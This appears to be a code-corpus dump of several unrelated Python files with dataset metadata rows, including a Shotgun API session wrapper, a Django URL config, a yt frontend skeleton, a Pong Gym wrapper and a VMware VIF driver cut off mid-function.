if not isinstance(raw['type'], basestring) or not isinstance(raw['id'], int):
raise ValueError('malformed JSON entity', spec)
return self.merge(raw)
# Accept integer IDs if we know we want a specific type.
if spec.isdigit():
if isinstance(entity_types, basestring):
entity_types = [entity_types]
if entity_types and len(entity_types) == 1:
return self.merge({'type': entity_types[0], 'id': int(spec)})
else:
raise ValueError('int-only spec without single entity_types', spec, entity_types)
# Shotgun detail URL.
m = re.match(r'^https?://\w+\.shotgunstudio\.com/detail/([A-Za-z]+\d*)/(\d+)', spec)
if m:
return self.merge({'type': m.group(1), 'id': int(m.group(2))})
# Shotgun project overview URL.
m = re.match(r'^https?://\w+\.shotgunstudio\.com/page/\d+#([A-Z][A-Za-z]+\d*)_(\d+)_', spec)
if m:
return self.merge({'type': m.group(1), 'id': int(m.group(2))})
# Shotgun page URL.
m = re.match(r'^https?://\w+\.shotgunstudio\.com/page/(\d+)$', spec)
if m:
if not fetch_project_from_page:
raise ValueError('page URL without fetch_project_from_page', spec)
page = self.get('Page', int(m.group(1)), ['project'])
if not page:
raise ValueError('Page entity not found for page URL', spec)
if page.get('project'):
return self.merge(page['project'])
raise ValueError('page URL has no project', spec)
# Direct entities. E.g. `shot:12345?code=whatever`
m = re.match(r'^([A-Za-z]{3,}\d*)[:_ -](\d+)(?:_|$|\?(\S*))', spec)
if m:
type_, id_, query = m.groups()
raw = {
'type': type_[0].upper() + type_[1:],
'id': int(id_),
}
if query:
for k, v in urlparse.parse_qsl(query, keep_blank_values=True):
raw.setdefault(k, v)
return self.merge(raw)
raise ValueError('could not parse entity spec', spec)
def _submit_concurrent(self, func, *args, **kwargs):
if not self._thread_pool:
from concurrent.futures import ThreadPoolExecutor
self._thread_pool = ThreadPoolExecutor(8)
return self._thread_pool.submit(func, *args, **kwargs)
@_asyncable
def create(self, type, data=None, return_fields=None, **kwargs):
"""Create an entity of the given type and data.
:return: The new :class:`~sgsession.entity.Entity`.
`See the Shotgun docs for more. <https://github.com/shotgunsoftware/python-api/wiki/Reference%3A-Methods#wiki-create>`_
"""
if data is not None and kwargs:
            # This isn't quite ideal, but it keeps confusing mixed input from getting through.
raise TypeError('provide only one of data or **kwargs')
data = self._minimize_entities(data if data is not None else kwargs)
if self.schema:
type = self.schema.resolve_one_entity(type)
data = self.schema.resolve_structure(data, type)
return_fields = self.schema.resolve_field(type, return_fields) if return_fields else []
return_fields = self._add_default_fields(type, return_fields)
return self.merge(self.shotgun.create(type, data, return_fields))
@_asyncable
def update(self, *args, **kwargs):
"""Update the given entity with the given fields.
.. todo:: Add this to the Entity.
`See the Shotgun docs for more. <https://github.com/shotgunsoftware/python-api/wiki/Reference%3A-Methods#wiki-update>`_
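        Accepts an :class:`~sgsession.entity.Entity`, an entity type plus ID,
        or a sequence of entities (dispatched via :meth:`batch`). Hypothetical
        examples; the entities and field values are illustrative::
            >>> sg.update(task, sg_status_list='ip')
            >>> sg.update('Task', 123, sg_status_list='ip')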
"""
# Grab the "type" or 1st argument.
if not (args or kwargs):
raise TypeError('no arguments')
type_ = kwargs.pop('type', None)
if type_ is None:
if not args:
raise TypeError('must provide "type" kwarg or positional type argument')
type_ = args[0]
args = args[1:]
# Figure out if we were given an Entity, or an entity type (string)
if isinstance(type_, Entity):
ids = [type_['id']]
type_ = type_['type']
do_batch = False
elif isinstance(type_, basestring):
ids = kwargs.pop('id', None) or args[0]
args = args[1:]
do_batch = not isinstance(ids, int)
ids = list(ids) if do_batch else [ids]
        elif isinstance(type_, (list, tuple)):
do_batch = True
entities = list(type_)
if not entities:
raise ValueError('entity sequence is empty')
sentinel = object()
non_entity = next((e for e in entities if not isinstance(e, Entity)), sentinel)
if non_entity is not sentinel:
raise ValueError('entity sequence contains non-Entity', non_entity)
type_ = entities[0]['type']
mismatched = next((e for e in entities if e['type'] != type_), None)
if mismatched is not None:
raise ValueError('mismatched entity types', type_, mismatched['type'])
ids = [e['id'] for e in entities]
else:
            raise TypeError('first argument must be an Entity, list of entities, or string (entity type)', type_)
data = {}
for arg in args:
data.update(arg)
data.update(kwargs)
if not data:
raise ValueError('no data provided')
data = self._minimize_entities(data)
if self.schema:
type_ = self.schema.resolve_one_entity(type_)
data = self.schema.resolve_structure(data, type_)
if do_batch:
return self.batch([{
'request_type': 'update',
'entity_type': type_,
'entity_id': id_,
'data': data,
} for id_ in ids])
else:
return self.merge(self.shotgun.update(type_, ids[0], data), over=True)
@_asyncable
def batch(self, requests):
"""Perform a series of requests in a transaction.
`See the Shotgun docs for more. <https://github.com/shotgunsoftware/python-api/wiki/Reference%3A-Methods#wiki-batch>`_
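        Each request is a plain dict in Shotgun's batch format; for example
        (the values are illustrative)::
            >>> sg.batch([{'request_type': 'update', 'entity_type': 'Task',
            ...            'entity_id': 123, 'data': {'sg_status_list': 'fin'}}])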
"""
requests = self._minimize_entities(requests)
if self.schema:
requests = self.schema.resolve_structure(requests)
return [self.merge(x, over=True) if isinstance(x, dict) else x for x in self.shotgun.batch(requests)]
def _add_default_fields(self, type_, fields):
fields = set(fields or ['id'])
# Add important fields for this type.
fields.update(self.important_fields_for_all)
fields.update(self.important_fields.get(type_, []))
# Add parent.
parent_field = self.parent_fields.get(type_)
if parent_field:
fields.add(parent_field)
# Add implied owners of deep-fields.
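        # E.g. a request for 'entity.Shot.code' implies 'entity.Shot.id', so the
        # linked entity can be identified and merged into the session.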
implied = set()
for field in fields:
parts = field.split('.')
for i in xrange(2, len(parts) + 1, 2):
implied.add('.'.join(parts[:i]) + '.id')
fields.update(implied)
# Add important deep-fields for requested type.
for local_field, link_types in self.important_links.get(type_, {}).iteritems():
fields.add(local_field)
for link_type in link_types:
remote_fields = self.important_fields.get(link_type, [])
remote_links = self.important_links.get(link_type, {})
for remote_field in itertools.chain(self.important_fields_for_all, remote_fields, remote_links.iterkeys()):
fields.add('%s.%s.%s' % (local_field, link_type, remote_field))
return sorted(fields)
def _minimize_entities(self, data):
if isinstance(data, dict):
# Attachments need to not be minimized, since they are often
# merged in with their own metadata. If we special cased merging
# them, then this could be a bit smarter and send only what is
            # necessary.
if data.get('type') == 'Attachment':
return data
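            # Anything else that looks like an entity collapses to its minimal
            # form, e.g. {'type': 'Shot', 'id': 1, 'code': 'X'} -> {'type': 'Shot', 'id': 1}.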
if 'type' in data and 'id' in data:
return dict(type=data['type'], id=data['id'])
return dict((k, self._minimize_entities(v)) for k, v in data.iteritems())
if isinstance(data, (list, tuple)):
return [self._minimize_entities(x) for x in data]
return data
@_asyncable
def find(self, type_, filters, fields=None, *args, **kwargs):
"""Find entities.
:return: :class:`list` of found :class:`~sgsession.entity.Entity`.
`See the Shotgun docs for more. <https://github.com/shotgunsoftware/python-api/wiki/Reference%3A-Methods#wiki-find>`_
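        Field names appear to support brace expansion (see ``expand_braces``),
        e.g. something like ``'entity.Shot.{code,id}'`` for two deep-fields.
        A hypothetical call, with an illustrative ``shot`` entity::
            >>> sg.find('Task', [('entity', 'is', shot)], ['content'])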
"""
merge = kwargs.pop('merge', True)
if self.schema:
type_ = self.schema.resolve_one_entity(type_)
if kwargs.pop('add_default_fields', True):
fields = self._add_default_fields(type_, fields)
# Expand braces in fields.
expanded_fields = set()
for field in fields:
expanded_fields.update(expand_braces(field))
fields = sorted(expanded_fields)
# Resolve names in fields.
if self.schema:
filters = self.schema.resolve_structure(filters)
fields = self.schema.resolve_field(type_, fields) if fields else []
filters = self._minimize_entities(filters)
# Resolve names in filters.
if self.schema and isinstance(filters, (list, tuple)):
for i, old_filter in enumerate(filters):
filter_ = [self.schema.resolve_one_field(type_, old_filter[0])]
filter_.extend(old_filter[1:])
filters[i] = filter_
result = self.shotgun.find(type_, filters, fields, *args, **kwargs)
return [self.merge(x, over=True) for x in result] if merge else result
@_asyncable
def find_one(self, entity_type, filters, fields=None, order=None,
filter_operator=None, retired_only=False, **kwargs):
"""Find one entity.
:return: :class:`~sgsession.entity.Entity` or ``None``.
`See the Shotgun docs for more. <https://github.com/shotgunsoftware/python-api/wiki/Reference%3A-Methods#wiki-find_one>`_
"""
results = self.find(entity_type, filters, fields, order,
filter_operator, 1, retired_only, **kwargs)
if results:
return results[0]
return None
def find_iter(self, *args, **kwargs):
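        """Iterate over matching entities, fetching pages concurrently.
        Accepts the same arguments as :meth:`find`, plus ``limit`` (stop after
        roughly this many results), ``per_page`` (page size, default 500), and
        ``async_count`` (number of page requests kept in flight, default 1).
        A hypothetical use, with illustrative field names::
            >>> for task in sg.find_iter('Task', [], ['content'], per_page=100):
            ...     print(task['content'])
        """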
limit = kwargs.pop('limit', None) or None
per_page = kwargs.pop('per_page', limit or 500) # this is the default
async_count = kwargs.pop('async_count', 1)
kwargs['limit'] = per_page
kwargs['async'] = True
page = 1
futures = []
done = False
while not done:
# extract all complete results; we wait for the first one, but
# then take as many others as are already done
rows = futures.pop(0).result() if futures else None
while rows and futures and futures[0].done():
rows.extend(futures.pop(0).result())
# determine if we are done yet
if rows is not None:
# print 'got', len(rows)
# we hit the end of results
if not rows or len(rows) < per_page:
done = True
# we hit the total requested
if limit is not None:
limit -= len(rows)
if limit <= 0:
done = True
# queue up the next queries
while not done and len(futures) < async_count:
                # print 'queuing', page
kwargs['page'] = page
futures.append(self.find(*args, **kwargs))
page += 1
# yield results
if rows is not None:
for x in rows:
yield x
@_asyncable
def delete(self, entity, entity_id=None):
"""Delete one entity.
.. warning:: This session will **not** forget about the deleted entity,
and all links from other entities will remain intact.
`See the Shotgun docs for more. <https://github.com/shotgunsoftware/python-api/wiki/Reference%3A-Methods#wiki-delete>`_
"""
if not isinstance(entity, Entity):
if self.schema:
entity = self.schema.resolve_one_entity(entity)
if not entity_id:
raise ValueError('must provide entity_id')
entity = self.merge({'type': entity, 'id': entity_id})
res = self.shotgun.delete(entity['type'], entity['id'])
entity._exists = False
return res
@_asyncable
def get(self, type_, id_, fields=None, fetch=True):
"""Get one entity by type and ID.
:param str type_: The entity type to lookup.
:param int id_: The entity ID to lookup. Accepts ``list`` or ``tuple``
of IDs, and returns the same.
:param bool fetch: Request this entity from the server if not cached?
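        For example (IDs are illustrative)::
            >>> sg.get('Shot', 1234)
            <Entity Shot:1234 at 0x...>
            >>> sg.get('Shot', (1234, 5678))  # returns a tuple of entities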
"""
# Handle multiple IDs.
if isinstance(id_, (list, tuple)):
return type(id_)(self.get(type_, x) for x in id_)
if self.schema:
type_ = self.schema.resolve_one_entity(type_)
try:
entity = self._cache[(type_, id_)]
except KeyError:
return self.find_one(type_, [('id', 'is', id_)], fields or [])
else:
if fetch and fields:
entity.fetch(fields)
return entity
def get_url(self, url):
"""Get one entity by it's URL on Shotgun.
:param str url: The url to parse.
"""
# Shotgun detail URL.
m = re.match(r'^https?://\w+\.shotgunstudio\.com/detail/([A-Za-z]+)/(\d+)', url)
if m:
return self.get(m.group(1).title(), int(m.group(2)))
# Shotgun project overview URL.
m = re.match(r'^https?://\w+\.shotgunstudio\.com/page/\d+#([A-Z][A-Za-z]+)_(\d+)_', url)
if m:
return self.get(m.group(1).title(), int(m.group(2)))
raise ValueError('cannot parse url: %r' % url)
def _fetch(self, entities, fields, force=False):
types = list(set(x['type'] for x in entities))
if len(types) > 1:
raise ValueError('can only fetch one type at once')
type_ = types[0]
ids_ = set()
for e in entities:
if force or any(f not in e for f in fields):
ids_.add(e['id'])
if ids_:
res = self.find(
type_,
[['id', 'in'] + list(ids_)],
fields,
)
missing = ids_.difference(e['id'] for e in res)
# Update _exists on the entities.
for e in entities:
e._exists = e['id'] not in missing
if missing:
raise EntityNotFoundError('%s %s not found' % (type_, ', '.join(map(str, sorted(missing)))))
@_assert_ownership
@_asyncable
def filter_exists(self, entities, check=True, force=False):
"""Return the subset of given entities which exist (non-retired).
:param list entities: An iterable of entities to check.
:param bool check: Should the server be consulted if we don't already know?
:param bool force: Should we always check the server?
:returns set: The entities which exist, or aren't sure about.
This will handle multiple entity-types in multiple requests.
"""
if check:
by_type = {}
for x in entities:
by_type.setdefault(x['type'], set()).add(x)
for type_, sub_entities in by_type.iteritems():
if force or any(e._exists is None for e in sub_entities):
found = self.find(type_, [['id', 'in'] + list(e['id'] for e in sub_entities)])
found_ids = set(e['id'] for e in found)
for e in sub_entities:
e._exists = e['id'] in found_ids
return set(e for e in entities if (e._exists or e._exists is None))
@_assert_ownership
@_asyncable
def fetch(self, to_fetch, fields, force=False):
"""Fetch the named fields on the given entities.
:param list to_fetch: Entities to fetch fields for.
:param list fields: The names of fields to fetch on those entities.
:param bool force: Perform a request even if we already have this data?
        This will safely handle multiple entity types at the same time, and
by default will only make requests of the server if some of the data
does not already exist.
.. note:: This does not assert that all "important" fields exist. See
:meth:`fetch_core`.
"""
by_type = {}
for x in to_fetch:
by_type.setdefault(x['type'], set()).add(x)
for type_, entities in by_type.iteritems():
self._fetch(entities, fields, force=force)
@_assert_ownership
@_asyncable
def fetch_backrefs(self, to_fetch, backref_type, field):
"""Fetch requested backrefs on the given entities.
:param list to_fetch: Entities to get backrefs on.
:param str backref_type: The entity type to look for backrefs on.
:param str field: The name of the field to look for backrefs in.
::
# Find all tasks which refer to this shot.
>>> session.fetch_backrefs([shot], 'Task', 'entity')
"""
by_type = {}
for x in to_fetch:
by_type.setdefault(x['type'], set()).add(x)
for type_, entities in by_type.iteritems():
self.find(backref_type, [[field, 'is'] + [x.minimal for x in entities]])
@_assert_ownership
@_asyncable
def fetch_core(self, to_fetch):
"""Assert all "important" fields exist, and fetch them if they do not.
:param list to_fetch: The entities to get the core fields on.
This will populate all important fields, and important fields on linked
entities.
"""
by_type = {}
for x in to_fetch:
by_type.setdefault(x['type'], set()).add(x)
for type_, entities in by_type.iteritems():
self._fetch(entities, itertools.chain(
self.important_fields_for_all,
self.important_fields.get(type_) or (),
self.important_links.get(type_, {}).iterkeys(),
))
@_assert_ownership
@_asyncable
def fetch_heirarchy(self, to_fetch):
"""Populate the parents as far up as we can go, and return all involved.
With (new-ish) arbitrarily-deep-links on Shotgun, this method could be
        made quite a bit more efficient, since it should be able to request
        the entire hierarchy for any given type at once.
See :attr:`parent_fields`.
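        For example (entity types are illustrative): given a few Tasks, this
        returns those Tasks plus the Shots, Sequences, and Project they hang
        off of, resolving one entity type per request via :attr:`parent_fields`.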
"""
all_nodes = set()
to_resolve = set()
loop_count = 0
while to_fetch or to_resolve:
# Just in case (because we have messed this up a few times before).
if loop_count > 20:
raise RuntimeError('likely infinite loop')
loop_count += 1
# Go as far up as we already have for the specified entities.
for entity in to_fetch:
all_nodes.add(entity)
while entity.parent(fetch=False):
entity = entity.parent()
all_nodes.add(entity)
if entity['type'] != 'Project':
to_resolve.add(entity)
# There is nothing new to fetch; bail!
if not to_resolve:
break
# Find the type that we have the most entities of, and remove them
# from the list to resolve.
by_type = {}
for x in to_resolve:
all_nodes.add(x)
by_type.setdefault(x['type'], set()).add(x)
type_, to_fetch = max(by_type.iteritems(), key=lambda x: len(x[1]))
to_resolve.difference_update(to_fetch)
# Fetch the parent names.
ids = [x['id'] for x in to_fetch]
parent_name = self.parent_fields[type_]
found = self.find(type_, [['id', 'in'] + ids], [parent_name])
# Make sure we actually get something back for the parent field.
no_parent = [e['id'] for e in found if not e.get(parent_name)]
if no_parent:
raise ValueError('%s %s %s no %s' % (
type_,
', '.join(str(id_) for id_ in sorted(no_parent)),
'have' if len(no_parent) > 1 else 'has',
parent_name,
))
# Track those which didn't come back from the API. Normally, this
# wouldn't happen, but can result from a race condition OR from
# an error on the server side (or a caching layer).
missing = to_fetch.difference(found)
if missing:
raise EntityNotFoundError('%s %s %s not exist' % (
type_,
                    ', '.join(str(e['id']) for e in sorted(missing, key=lambda e: e['id'])),
'do' if len(missing) > 1 else 'does',
))
return list(all_nodes)
_guessed_user_lock = threading.Lock()
@_asyncable
def guess_user(self, filter=('email', 'starts_with', '{login}@'), fields=(), fetch=True):
"""Guess Shotgun user from current login name.
        Looks for ``$SHOTGUN_USER_ID`` in your environment, then falls back to
        a user whose email has the current login name as its account part.
:returns: ``dict`` of ``HumanUser``, or ``None``.
"""
with self._guessed_user_lock:
try:
user = self._guessed_user
except AttributeError:
user = self._guess_user(filter, fields, fetch)
if user:
Session._guessed_user = self.merge(user).as_dict()
else:
Session._guessed_user = None
if not user:
return
entity = self.merge(user)
if fields:
entity.fetch(fields)
return entity
def _guess_user(self, filter, fields, fetch):
# This envvar is used only for this purpose (at Western Post)
id_ = os.environ.get('SHOTGUN_USER_ID')
if id_:
return {'type': 'HumanUser', 'id': int(id_)}
if not fetch:
return
# This envvar is more general, and respected by shotgun_api3_registry.
login = os.environ.get('SHOTGUN_SUDO_AS_LOGIN')
if login:
return self.find_one('HumanUser', [
('login', 'is', login),
], fields or ())
# Finally, search for a user based on the current login.
try:
login = os.getlogin()
except OSError as e:
# this fails on the farm, so fall back onto the envvar
if e.errno != errno.ENOTTY:
raise
login = os.environ.get('USER')
filter_ = tuple(x.format(login=login) for x in filter)
return self.find_one('HumanUser', [filter_], fields)
| 36.921348
| 129
| 0.572373
|
2a33b7f91cebd111b2805b0a22b68cc8249af39d
| 249
|
py
|
Python
|
Yatube/hw02_community/posts/urls.py
|
abi83/YaPractice
|
1c3a5670ee2f872d4f872623a392755318b893b5
|
[
"MIT"
] | 3
|
2020-11-18T05:16:30.000Z
|
2021-03-08T06:36:01.000Z
|
Yatube/hw02_community/posts/urls.py
|
abi83/YaPractice
|
1c3a5670ee2f872d4f872623a392755318b893b5
|
[
"MIT"
] | null | null | null |
Yatube/hw02_community/posts/urls.py
|
abi83/YaPractice
|
1c3a5670ee2f872d4f872623a392755318b893b5
|
[
"MIT"
] | 1
|
2021-01-20T12:41:48.000Z
|
2021-01-20T12:41:48.000Z
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.posts_list, name='posts-list'),
path('group/', views.groups_list, name='groups-list'),
path('group/<slug:slug>/', views.group_posts, name='group-posts'),
]
| 27.666667
| 70
| 0.674699
|
60e6ebbec2fe7842144abe0d94ca1d6aebf1444c
| 5,757
|
py
|
Python
|
yt/frontends/_skeleton/data_structures.py
|
aemerick/yt
|
984484616d75c6d7603e71b9d45c5d617705a0e5
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
yt/frontends/_skeleton/data_structures.py
|
aemerick/yt
|
984484616d75c6d7603e71b9d45c5d617705a0e5
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
yt/frontends/_skeleton/data_structures.py
|
aemerick/yt
|
984484616d75c6d7603e71b9d45c5d617705a0e5
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
import os
import numpy as np
import weakref
from yt.data_objects.grid_patch import \
AMRGridPatch
from yt.geometry.grid_geometry_handler import \
GridIndex
from yt.data_objects.static_output import \
Dataset
from .fields import SkeletonFieldInfo
class SkeletonGrid(AMRGridPatch):
_id_offset = 0
def __init__(self, id, index, level):
super(SkeletonGrid, self).__init__(
id, filename=index.index_filename, index=index)
self.Parent = None
self.Children = []
self.Level = level
def __repr__(self):
return "SkeletonGrid_%04i (%s)" % (self.id, self.ActiveDimensions)
class SkeletonHierarchy(GridIndex):
grid = SkeletonGrid
def __init__(self, ds, dataset_type='skeleton'):
self.dataset_type = dataset_type
self.dataset = weakref.proxy(ds)
# for now, the index file is the dataset!
self.index_filename = self.dataset.parameter_filename
self.directory = os.path.dirname(self.index_filename)
        # float type for the simulation edges; must be float64 for now
self.float_type = np.float64
super(SkeletonHierarchy, self).__init__(ds, dataset_type)
def _detect_output_fields(self):
# This needs to set a self.field_list that contains all the available,
# on-disk fields. No derived fields should be defined here.
# NOTE: Each should be a tuple, where the first element is the on-disk
# fluid type or particle type. Convention suggests that the on-disk
# fluid type is usually the dataset_type and the on-disk particle type
# (for a single population of particles) is "io".
pass
def _count_grids(self):
# This needs to set self.num_grids
pass
def _parse_index(self):
# This needs to fill the following arrays, where N is self.num_grids:
# self.grid_left_edge (N, 3) <= float64
# self.grid_right_edge (N, 3) <= float64
# self.grid_dimensions (N, 3) <= int
# self.grid_particle_count (N, 1) <= int
# self.grid_levels (N, 1) <= int
# self.grids (N, 1) <= grid objects
# self.max_level = self.grid_levels.max()
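        # A purely illustrative sketch of the required assignments (not a
        # working frontend; real values must come from the on-disk index):
        #     self.grid_left_edge = np.zeros((self.num_grids, 3), dtype="float64")
        #     self.grid_right_edge = np.ones((self.num_grids, 3), dtype="float64")
        #     self.grid_dimensions = np.ones((self.num_grids, 3), dtype="int32")
        #     self.grid_particle_count = np.zeros((self.num_grids, 1), dtype="int32")
        #     self.grid_levels = np.zeros((self.num_grids, 1), dtype="int32")
        #     self.grids = np.empty(self.num_grids, dtype="object")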
pass
def _populate_grid_objects(self):
# For each grid g, this must call:
# g._prepare_grid()
# g._setup_dx()
# This must also set:
# g.Children <= list of child grids
# g.Parent <= parent grid
# This is handled by the frontend because often the children must be
# identified.
pass
class SkeletonDataset(Dataset):
_index_class = SkeletonHierarchy
_field_info_class = SkeletonFieldInfo
def __init__(self, filename, dataset_type='skeleton',
storage_filename=None,
units_override=None):
self.fluid_types += ('skeleton',)
super(SkeletonDataset, self).__init__(filename, dataset_type,
units_override=units_override)
self.storage_filename = storage_filename
# refinement factor between a grid and its subgrid
# self.refine_by = 2
def _set_code_unit_attributes(self):
# This is where quantities are created that represent the various
# on-disk units. These are the currently available quantities which
# should be set, along with examples of how to set them to standard
# values.
#
# self.length_unit = self.quan(1.0, "cm")
# self.mass_unit = self.quan(1.0, "g")
# self.time_unit = self.quan(1.0, "s")
# self.time_unit = self.quan(1.0, "s")
#
# These can also be set:
# self.velocity_unit = self.quan(1.0, "cm/s")
# self.magnetic_unit = self.quan(1.0, "gauss")
pass
def _parse_parameter_file(self):
# This needs to set up the following items. Note that these are all
# assumed to be in code units; domain_left_edge and domain_right_edge
# will be converted to YTArray automatically at a later time.
# This includes the cosmological parameters.
#
# self.parameters <= full of code-specific items of use
# self.domain_left_edge <= array of float64
# self.domain_right_edge <= array of float64
# self.dimensionality <= int
# self.domain_dimensions <= array of int64
# self.periodicity <= three-element tuple of booleans
# self.current_time <= simulation time in code units
#
# We also set up cosmological information. Set these to zero if
# non-cosmological.
#
# self.cosmological_simulation <= int, 0 or 1
# self.current_redshift <= float
# self.omega_lambda <= float
# self.omega_matter <= float
# self.hubble_constant <= float
# optional (has default implementation)
# self.unique_identifier <= unique identifier for the dataset
# being read (e.g., UUID or ST_CTIME) (int)
pass
@classmethod
def _is_valid(self, *args, **kwargs):
# This accepts a filename or a set of arguments and returns True or
# False depending on if the file is of the type requested.
#
# The functionality in this method should be unique enough that it can
# differentiate the frontend from others. Sometimes this means looking
# for specific fields or attributes in the dataset in addition to
# looking at the file name or extension.
return False
| 39.703448
| 84
| 0.614382
|
75e8ee6f132dd309dc56b77e83bb42b76ddc3477
| 484
|
py
|
Python
|
apps/06_lolcat_factory/you_try/my_app/venv/Scripts/pip3.5-script.py
|
jstrat1618/python-jumpstart-course-demos
|
4f022653fd452d649a654dc94afb9c63797806ca
|
[
"MIT"
] | 1
|
2018-03-28T03:15:02.000Z
|
2018-03-28T03:15:02.000Z
|
apps/06_lolcat_factory/you_try/my_app/venv/Scripts/pip3.5-script.py
|
jstrat1618/python-jumpstart-course-demos
|
4f022653fd452d649a654dc94afb9c63797806ca
|
[
"MIT"
] | null | null | null |
apps/06_lolcat_factory/you_try/my_app/venv/Scripts/pip3.5-script.py
|
jstrat1618/python-jumpstart-course-demos
|
4f022653fd452d649a654dc94afb9c63797806ca
|
[
"MIT"
] | null | null | null |
#!C:\Users\JustinandAbigail\Desktop\python-jumpstart-course-demos-master\apps\06_lolcat_factory\you_try\my_app\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==9.0.1','console_scripts','pip3.5'
__requires__ = 'pip==9.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==9.0.1', 'console_scripts', 'pip3.5')()
)
| 37.230769
| 134
| 0.698347
|
9aa0ac9290de1ed776f8bcbe45b74f9d730ff56d
| 687
|
py
|
Python
|
learning/sources/source_gym_pong.py
|
bermeom/quadruped-robot
|
5570c720a27b26f94236ebc2ff41f0a1549f10b8
|
[
"MIT"
] | 8
|
2018-12-19T17:30:10.000Z
|
2021-05-09T17:53:03.000Z
|
learning/sources/source_gym_pong.py
|
bermeom/quadruped-robot
|
5570c720a27b26f94236ebc2ff41f0a1549f10b8
|
[
"MIT"
] | null | null | null |
learning/sources/source_gym_pong.py
|
bermeom/quadruped-robot
|
5570c720a27b26f94236ebc2ff41f0a1549f10b8
|
[
"MIT"
] | 2
|
2020-10-06T01:56:30.000Z
|
2021-04-28T18:31:39.000Z
|
from sources.source_gym import source_gym
import cv2
import numpy as np
##### SOURCE GYM PONG
class source_gym_pong( source_gym ):
### __INIT__
def __init__( self ):
source_gym.__init__( self , 'Pong-v4' )
### INFORMATION
def num_actions( self ): return 3
### MAP KEYS
def map_keys( self , actn ):
if actn[0] : return 1
if actn[1] : return 2
if actn[2] : return 3
### PROCESS OBSERVATION
def process( self , obsv ):
obsv = cv2.resize( obsv , ( 80 , 80 ) )
obsv = cv2.cvtColor( obsv , cv2.COLOR_BGR2GRAY )
_ , obsv = cv2.threshold( obsv , 97 , 255 , cv2.THRESH_BINARY )
return obsv
| 21.46875
| 71
| 0.588064
|
5d4979991a437be55854a04bc00e640ee651d788
| 9,228
|
py
|
Python
|
hybrid_cloud_patches/python/nova/virt/hybridvmwareapi/vif.py
|
Hybrid-Cloud/badam
|
390ad3a6fc03948008f7c04ed2f9fcc8514cc1eb
|
[
"Apache-2.0"
] | 2
|
2015-06-15T02:16:33.000Z
|
2022-02-23T07:10:38.000Z
|
hybrid_cloud_patches/python/nova/virt/hybridvmwareapi/vif.py
|
Hybrid-Cloud/badam
|
390ad3a6fc03948008f7c04ed2f9fcc8514cc1eb
|
[
"Apache-2.0"
] | 7
|
2016-05-13T06:39:45.000Z
|
2016-05-20T02:55:31.000Z
|
hybrid_cloud_patches/python/nova/virt/hybridvmwareapi/vif.py
|
Hybrid-Cloud/badam
|
390ad3a6fc03948008f7c04ed2f9fcc8514cc1eb
|
[
"Apache-2.0"
] | 4
|
2015-11-02T04:02:50.000Z
|
2021-05-13T17:06:00.000Z
|
"""VIF drivers for VMware."""
from oslo.config import cfg
from oslo.vmware import exceptions as vexc
from nova import exception
from nova.i18n import _
from nova.network import model
from nova.openstack.common import log as logging
from nova.virt.hybridvmwareapi import network_util
from nova.virt.vmwareapi import vim_util
from nova.virt.vmwareapi import vm_util
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
vmwareapi_vif_opts = [
cfg.StrOpt('vlan_interface',
default='vmnic0',
help='Physical ethernet adapter name for vlan networking'),
cfg.StrOpt('integration_bridge',
default='br-int',
help='Name of Integration Bridge'),
]
CONF.register_opts(vmwareapi_vif_opts, 'vmware')
def _get_associated_vswitch_for_interface(session, interface, cluster=None):
# Check if the physical network adapter exists on the host.
if not network_util.check_if_vlan_interface_exists(session,
interface, cluster):
raise exception.NetworkAdapterNotFound(adapter=interface)
# Get the vSwitch associated with the Physical Adapter
vswitch_associated = network_util.get_vswitch_for_vlan_interface(
session, interface, cluster)
if not vswitch_associated:
raise exception.SwitchNotFoundForNetworkAdapter(adapter=interface)
return vswitch_associated
def ensure_vlan_bridge(session, vif, cluster=None, create_vlan=True):
"""Create a vlan and bridge unless they already exist."""
vlan_num = vif['network'].get_meta('vlan')
bridge = vif['network']['bridge']
vlan_interface = CONF.vmware.vlan_interface
network_ref = network_util.get_network_with_the_name(session, bridge,
cluster)
if network_ref and network_ref['type'] == 'DistributedVirtualPortgroup':
return network_ref
if not network_ref:
# Create a port group on the vSwitch associated with the
# vlan_interface corresponding physical network adapter on the ESX
# host.
vswitch_associated = \
_get_associated_vswitch_for_interface(session,
vlan_interface,
cluster)
network_util.create_port_group(session, bridge,
vswitch_associated,
vlan_num if create_vlan else 0,
cluster)
network_ref = network_util.get_network_with_the_name(session,
bridge,
cluster)
elif create_vlan:
# Get the vSwitch associated with the Physical Adapter
vswitch_associated = \
_get_associated_vswitch_for_interface(session,
vlan_interface, cluster)
# Get the vlan id and vswitch corresponding to the port group
_get_pg_info = network_util.get_vlanid_and_vswitch_for_portgroup
pg_vlanid, pg_vswitch = _get_pg_info(session, bridge, cluster)
# Check if the vswitch associated is proper
if pg_vswitch != vswitch_associated:
raise exception.InvalidVLANPortGroup(
bridge=bridge, expected=vswitch_associated,
actual=pg_vswitch)
# Check if the vlan id is proper for the port group
if pg_vlanid != vlan_num:
raise exception.InvalidVLANTag(bridge=bridge, tag=vlan_num,
pgroup=pg_vlanid)
return network_ref
def _is_valid_opaque_network_id(opaque_id, bridge_id, integration_bridge,
num_networks):
return (opaque_id == bridge_id or
(num_networks == 1 and
opaque_id == integration_bridge))
def _get_network_ref_from_opaque(opaque_networks, integration_bridge, bridge):
num_networks = len(opaque_networks)
for network in opaque_networks:
if _is_valid_opaque_network_id(network['opaqueNetworkId'], bridge,
integration_bridge, num_networks):
return {'type': 'OpaqueNetwork',
'network-id': network['opaqueNetworkId'],
'network-name': network['opaqueNetworkName'],
'network-type': network['opaqueNetworkType']}
LOG.warning(_("No valid network found in %(opaque)s, from %(bridge)s "
"or %(integration_bridge)s"),
{'opaque': opaque_networks, 'bridge': bridge,
'integration_bridge': integration_bridge})
def _get_opaque_network(session, cluster):
host = vm_util.get_host_ref(session, cluster)
try:
opaque = session._call_method(vim_util, "get_dynamic_property", host,
"HostSystem",
"config.network.opaqueNetwork")
except vexc.InvalidPropertyException:
opaque = None
return opaque
def get_neutron_network_with_vlan(session, vif,
portgroup_instance_mapping,
cluster=None, create_vlan=True):
"""Create a vlan and bridge unless they already exist."""
vlan_num = portgroup_instance_mapping.vlan
